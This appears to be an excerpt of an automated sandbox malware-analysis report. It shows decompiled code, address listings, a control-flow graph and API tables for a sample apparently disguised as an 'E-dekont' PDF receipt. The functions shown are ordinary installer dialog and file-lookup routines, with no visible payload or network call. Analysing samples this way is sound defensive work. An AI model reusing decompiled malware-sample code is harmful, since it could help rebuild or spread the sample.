                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x45e798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x45e798;
			}




                                                                                              0x004069a9
                                                                                              0x004069b2
                                                                                              0x00000000
                                                                                              0x004069bf
                                                                                              0x004069b5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,0045E798,0045A750,00406088,0045A750,0045A750,00000000,0045A750,0045A750, 4?v.?v,?,763F2EE0,00405D94,?,763F3420,763F2EE0), ref: 004069A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: c32f58e4d31b2ef6d3786c7b8b69fce70f81a3369091677325aea235ed7fe711
                                                                                              • Instruction ID: 0939914d34cf82b3cca468ead3a61b39ea3ddbd3f2cdf74c5f5b480a9345878f
                                                                                              • Opcode Fuzzy Hash: c32f58e4d31b2ef6d3786c7b8b69fce70f81a3369091677325aea235ed7fe711
                                                                                              • Instruction Fuzzy Hash: 9FD012B15182205FD34057386E0C84B7E989F163317258A36B8AAF11E0CB348C3697AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 199 4040e9-4040f2 195->199 197 40429c-4042b1 196->197 198 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->198 203 4042f1-4042f6 call 404610 197->203 204 4042b3-4042b6 197->204 198->197 200 4040f4-404101 SetWindowPos 199->200 201 404107-40410e 199->201 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 211 4042fb-404316 203->211 209 4042b8-4042c3 call 401389 204->209 210 4042e9-4042eb 204->210 212 404130-404143 GetWindowLongW 206->212 213 40422b-404239 call 40462b 206->213 214 404171-404174 207->214 215 40415a-40416c DestroyWindow 207->215 209->210 235 4042c5-4042e4 SendMessageW 209->235 210->203 218 404591 210->218 220 404318-40431a call 40140b 211->220 221 40431f-404325 211->221 212->213 222 404149-40414c ShowWindow 212->222 225 404593-40459a 213->225 226 404176-404182 SetWindowLongW 214->226 227 404187-40418d 214->227 223 40456e-404574 215->223 218->225 220->221 232 40432b-404336 221->232 233 40454f-404568 DestroyWindow EndDialog 221->233 222->207 223->218 231 404576-40457c 223->231 226->225 227->213 234 404193-4041a2 GetDlgItem 227->234 231->218 236 40457e-404587 ShowWindow 231->236 232->233 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 232->237 233->223 238 4041c1-4041c4 234->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 234->239 235->225 236->218 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 241 4041c6-4041c7 238->241 242 4041c9-4041cc 238->242 239->218 239->238 244 4041f7-4041fc call 40459d 241->244 245 4041da-4041df 242->245 246 4041ce-4041d4 242->246 244->213 247 404215-404225 SendMessageW 245->247 249 4041e1-4041e7 245->249 246->247 248 4041d6-4041d8 246->248 247->213 248->244 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 262 4041f5 252->262 253->213 263 404209-404213 253->263 262->244 263->262 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->211 286 404464-404466 275->286 286->211 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->218 290 40447e-404484 288->290 289->223 291 4044a9-4044d6 CreateDialogParamW 289->291 290->211 292 40448a 290->292 291->223 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->218 293->218 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->223
                                                                                              C-Code - Quality: 84%
                                                                                              			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x446730 = _t34;
					if(_t130 == 0x110) {
						 *0x470268 = _t127;
						 *0x446744 = GetDlgItem(_t127, "true");
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x436710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x468248);
						 *0x46822c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x446730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x470280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x446730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x470284;
							if(_t38 ==  *0x470284) {
								E0040140B("true");
							}
							__eflags =  *0x46822c - _t136;
							if( *0x46822c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x470284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x4e9000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x4702ec - _t136;
							_v28 = _t48;
							if( *0x4702ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x436710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push("true");
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, "true");
							__eflags =  *0x4702ec - _t136;
							if( *0x4702ec == _t136) {
								_push( *0x446744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x436710);
							}
							E004045F9();
							E00406668(0x446748, E004040A6());
							E004066A5(0x446748, _t127, _t133,  &(0x446748[lstrlenW(0x446748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x446748); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x468238); // executed
									 *0x43e720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x470260,  *_t133 +  *0x468240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x468238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x468238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x46822c - _t136;
									if( *0x46822c != _t136) {
										goto L63;
									}
									ShowWindow( *0x468238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x4702ec - _t136;
								if( *0x4702ec != _t136) {
									goto L63;
								}
								__eflags =  *0x4702e0 - _t136;
								if( *0x4702e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x468238);
						 *0x470268 = _t136;
						EndDialog(_t127,  *0x43a718);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x468238, 0x40f, 0, "true");
						__eflags =  *0x46822c;
						return 0 |  *0x46822c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x446728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x468238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x4702ec - _t136;
											if( *0x4702ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x43a718 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x43a718 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x468238);
						 *0x468238 = _t122;
						L60:
						if( *0x456748 == _t136 &&  *0x468238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x456748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x446728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                              0x004040d0
                                                                                              0x004040d7
                                                                                              0x0040423e
                                                                                              0x00404242
                                                                                              0x00404246
                                                                                              0x00404248
                                                                                              0x0040424d
                                                                                              0x00404258
                                                                                              0x00404263
                                                                                              0x00404268
                                                                                              0x0040426a
                                                                                              0x0040426c
                                                                                              0x0040426f
                                                                                              0x00404274
                                                                                              0x00404282
                                                                                              0x0040428f
                                                                                              0x00404296
                                                                                              0x00404296
                                                                                              0x00404297
                                                                                              0x00404297
                                                                                              0x0040429c
                                                                                              0x004042a2
                                                                                              0x004042a9
                                                                                              0x004042af
                                                                                              0x004042b1
                                                                                              0x004042f1
                                                                                              0x004042f6
                                                                                              0x004042fb
                                                                                              0x004042fb
                                                                                              0x00404300
                                                                                              0x00404309
                                                                                              0x0040430b
                                                                                              0x00404310
                                                                                              0x00404316
                                                                                              0x0040431a
                                                                                              0x0040431a
                                                                                              0x0040431f
                                                                                              0x00404325
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404330
                                                                                              0x00404336
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040433f
                                                                                              0x00404347
                                                                                              0x0040434c
                                                                                              0x0040434f
                                                                                              0x00404355
                                                                                              0x0040435a
                                                                                              0x0040435d
                                                                                              0x00404363
                                                                                              0x00404368
                                                                                              0x0040436b
                                                                                              0x00404371
                                                                                              0x00404379
                                                                                              0x0040437f
                                                                                              0x00404385
                                                                                              0x00404389
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x0040439a
                                                                                              0x004043ac
                                                                                              0x004043b8
                                                                                              0x004043bd
                                                                                              0x004043c7
                                                                                              0x004043cd
                                                                                              0x004043cf
                                                                                              0x004043d4
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043e4
                                                                                              0x004043fc
                                                                                              0x004043fe
                                                                                              0x00404404
                                                                                              0x00404419
                                                                                              0x00404406
                                                                                              0x0040440f
                                                                                              0x00404411
                                                                                              0x00404411
                                                                                              0x0040441f
                                                                                              0x00404430
                                                                                              0x00404446
                                                                                              0x0040444d
                                                                                              0x00404453
                                                                                              0x00404457
                                                                                              0x0040445c
                                                                                              0x0040445e
                                                                                              0x00000000
                                                                                              0x00404464
                                                                                              0x00404464
                                                                                              0x00404466
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040446c
                                                                                              0x00404470
                                                                                              0x00404495
                                                                                              0x0040449b
                                                                                              0x004044a1
                                                                                              0x004044a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044c9
                                                                                              0x004044cf
                                                                                              0x004044d1
                                                                                              0x004044d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044dc
                                                                                              0x004044df
                                                                                              0x004044e2
                                                                                              0x004044f9
                                                                                              0x00404505
                                                                                              0x0040451e
                                                                                              0x00404524
                                                                                              0x00404528
                                                                                              0x0040452d
                                                                                              0x00404533
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040453d
                                                                                              0x00404548
                                                                                              0x00000000
                                                                                              0x00404548
                                                                                              0x00404472
                                                                                              0x00404478
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040447e
                                                                                              0x00404484
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040448a
                                                                                              0x0040445e
                                                                                              0x00404555
                                                                                              0x00404561
                                                                                              0x00404568
                                                                                              0x00000000
                                                                                              0x004042b3
                                                                                              0x004042b3
                                                                                              0x004042b6
                                                                                              0x004042e9
                                                                                              0x004042e9
                                                                                              0x004042eb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042eb
                                                                                              0x004042b8
                                                                                              0x004042bc
                                                                                              0x004042c1
                                                                                              0x004042c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042d3
                                                                                              0x004042db
                                                                                              0x00000000
                                                                                              0x004042e1
                                                                                              0x004040e9
                                                                                              0x004040e9
                                                                                              0x004040ed
                                                                                              0x004040f2
                                                                                              0x00404101
                                                                                              0x00404101
                                                                                              0x00404107
                                                                                              0x0040410e
                                                                                              0x00404152
                                                                                              0x00404158
                                                                                              0x00404171
                                                                                              0x00404174
                                                                                              0x00404187
                                                                                              0x0040418d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404193
                                                                                              0x0040419e
                                                                                              0x004041a0
                                                                                              0x004041a2
                                                                                              0x004041c1
                                                                                              0x004041c1
                                                                                              0x004041c4
                                                                                              0x004041c9
                                                                                              0x004041cc
                                                                                              0x004041dc
                                                                                              0x004041dd
                                                                                              0x004041df
                                                                                              0x00404215
                                                                                              0x00404225
                                                                                              0x00000000
                                                                                              0x00404225
                                                                                              0x004041e1
                                                                                              0x004041e7
                                                                                              0x00404200
                                                                                              0x00404205
                                                                                              0x00404207
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404209
                                                                                              0x004041f5
                                                                                              0x004041f5
                                                                                              0x004041f7
                                                                                              0x004041f7
                                                                                              0x00000000
                                                                                              0x004041f7
                                                                                              0x004041ea
                                                                                              0x004041ef
                                                                                              0x00000000
                                                                                              0x004041ef
                                                                                              0x004041ce
                                                                                              0x004041d4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x004041c6
                                                                                              0x00000000
                                                                                              0x004041c6
                                                                                              0x004041ac
                                                                                              0x004041b3
                                                                                              0x004041b9
                                                                                              0x004041bb
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x004041bb
                                                                                              0x00404179
                                                                                              0x00000000
                                                                                              0x00404181
                                                                                              0x00404160
                                                                                              0x00404166
                                                                                              0x0040456e
                                                                                              0x00404574
                                                                                              0x00404581
                                                                                              0x00404587
                                                                                              0x00404587
                                                                                              0x00000000
                                                                                              0x00404110
                                                                                              0x00404115
                                                                                              0x00404121
                                                                                              0x0040412a
                                                                                              0x0040422b
                                                                                              0x00000000
                                                                                              0x00404149
                                                                                              0x0040414c
                                                                                              0x00000000
                                                                                              0x0040414c
                                                                                              0x0040412a
                                                                                              0x0040410e

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                              • ShowWindow.USER32(?), ref: 00404121
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                              • DestroyWindow.USER32 ref: 00404160
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                              • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                              • GetDlgItem.USER32(?,?), ref: 0040425E
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004042D3
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004043DD
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004043FC
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                              • lstrlenW.KERNEL32(00446748,?,00446748,00000000), ref: 00404439
                                                                                              • SetWindowTextW.USER32(?,00446748), ref: 0040444D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: HgD
                                                                                              • API String ID: 121052019-3670375811
                                                                                              • Opcode ID: f0ca54b1b709ab7b6e06556346698c125ee57b0af9b2711805f2ee2a04c0cfa3
                                                                                              • Instruction ID: e6ebe5c6d144bb258484d91c8d6910a5e475318fdd1ac2ca1aecf085551c263c
                                                                                              • Opcode Fuzzy Hash: f0ca54b1b709ab7b6e06556346698c125ee57b0af9b2711805f2ee2a04c0cfa3
                                                                                              • Instruction Fuzzy Hash: 15C1E5B1540604BBDB206F61ED89E2A3BA8FB85349F00057EF781B51F1CB795881DB1E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

